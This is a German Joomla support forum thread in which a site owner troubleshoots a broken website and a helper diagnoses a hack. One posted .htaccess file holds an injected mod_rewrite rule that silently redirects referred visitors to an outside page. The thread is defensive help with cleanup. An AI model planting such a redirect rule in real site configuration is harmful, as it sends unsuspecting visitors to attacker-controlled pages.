Willkommen, Gast
Benutzername: Passwort: Angemeldet bleiben:
  • Seite:
  • 1

THEMA:

HTTP 404: Nicht gefunden 11 Feb 2013 18:19 #36065

Wir haben ein Problem mit unserer homepage www.topsport-samedan.ch .

Vor einigen Tagen hat ein Kunde uns darauf aufmerksam gemacht, dass unsere Webpage nicht korrekt und/oder gar nicht angezeigt wird. Auch wenn ich in den Administrationsbereich von Joomla einsteigen möchte, geht das nicht. Habe seit Dezember keine Änderungen vorgenommen & das Problem scheint wie von alleine entstanden zu sein :(

Kann mir jemand weiterhelfen, da ich überhaupt keine Ahnung habe, wo zu beginnen. Zuerst habe ich unseren Provider witweb.ch kontaktiert - dieser hat gesagt es sei ein Problem von Joomla.

Ich betreue auch die Homepage www.tennis-samedan.ch über Witweb und Joomla - diese funktioniert nach wie vor einwandfrei.

Um einige Tips, was falsch ist & was ich dagegen unternehmen kann, wären ich sehr dankbar :)

Vielen Dank
Sandra

Bitte Anmelden oder Registrieren um der Konversation beizutreten.

HTTP 404: Nicht gefunden 11 Feb 2013 18:26 #36066

Also, wenn man immer wieder auf der Seite gabriellerosephotography.com/emad.html?h=947989 landet, egal, was man tut, dann dürfte deine Seite wohl gehackt worden sein. Ich empfehle dir zuerst mal einen Blick in die .htaccess und dann die Neuinstallation mit einem hoffentlich vorhandenen Backup.
Und im Anschluss heisst es wohl: Update, Backup, Update, Backup...

Und: Das Problem entstand sicherlich nicht 'von alleine'!
Joomla! 3: Professionelle Webentwicklung von David Jardin und Elisa Foltyn - das Standardwerk zu Joomla! 3
Wer nicht über den Anstand verfügt, ein kleines "Thänx" auszusprechen, muss sich nicht wundern, künftig ignoriert zu werden!
Kein Support via PM oder Mail. Entsprechende Anfragen werden ignoriert.

Bitte Anmelden oder Registrieren um der Konversation beizutreten.

Letzte Änderung: von Chris Hoefliger.

HTTP 404: Nicht gefunden 11 Feb 2013 20:03 #36067

Chris - herzlichen Dank für die Antwort.

Hab mal die Datei angeschaut, das steht folgendes:

Redirect /index.html www.topsport-samedan.ch/jl/index.php

# -FrontPage-

IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*

<Limit GET POST>
order deny,allow
deny from all
allow from all
</Limit>
<Limit PUT DELETE>
order deny,allow
deny from all
</Limit>
AuthName topsport-samedan.ch
AuthUserFile /var/www/vhosts/topsport-samedan.ch/httpdocs/_vti_pvt/service.pwd
AuthGroupFile /var/www/vhosts/topsport-samedan.ch/httpdocs/_vti_pvt/service.grp



Da mir alles unbekannt vorkommt, wäre ich dankbar um eine weitere kurze Antwort. Ist die Website tatsächlich gehackt? So werde ich wohl oder übel alles neu aufsetzten müssen.

Komischerweise werde ich nicht weitergeleitet - bei mir kommt zuerst unsere Website, nicht korrekt dargestellt (siehe Bild 1 im Anhang), und wenn ich dann auf ein weiteres Menü klicke kommt HTTP 404 (siehe Bild 2) im Anhang.

Und: Mir ist schon klar, dass dies nicht einfach so von alleine passiert ist - was ich damit sagen wollte, ist, ich habe seit langem keine Änderungen vorgenommen & plötzlich klappts nichts mehr ;)

Vielen herzlichen Dank für die Hilfe!

Bitte Anmelden oder Registrieren um der Konversation beizutreten.

HTTP 404: Nicht gefunden 11 Feb 2013 21:08 #36068

Habe noch etwas gestöbert auf dem FTP und habe eine weitere .htaacess Datei gefunden, die folgendes enthält:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]
RewriteRule ^.*$ gabriellerosephotography.com/emad.html?h=947989 [L,R]
</IfModule>



Kann ich da was unternehmen, um diese Gabirelle Rose Photography zu entfernen?

Herzlichen Dank

Bitte Anmelden oder Registrieren um der Konversation beizutreten.

HTTP 404: Nicht gefunden 12 Feb 2013 07:57 #36069

Ja, solange du noch die htaccess.txt von Joomla! hast, kannst du selbige (nach Löschen der .htaccess) in .htaccess umbenennen. Vielleicht musst du die Zeile
Options +FollowSymLinks

so auskommentieren
#Options +FollowSymLinks

Aber wie gesagt: Wenn die Seite schon gehackt worden ist, wird wohl auch sonst Übles passiert sein, eine Neuinstallation ab Backup wäre auf jeden Fall sicherer. Im Übrigen musst du auch alle Verzeichnisse nach weiteren Kopien von .htaccess-Dateien abklappern würde ich mal raten.
Joomla! 3: Professionelle Webentwicklung von David Jardin und Elisa Foltyn - das Standardwerk zu Joomla! 3
Wer nicht über den Anstand verfügt, ein kleines "Thänx" auszusprechen, muss sich nicht wundern, künftig ignoriert zu werden!
Kein Support via PM oder Mail. Entsprechende Anfragen werden ignoriert.

Bitte Anmelden oder Registrieren um der Konversation beizutreten.

  • Seite:
  • 1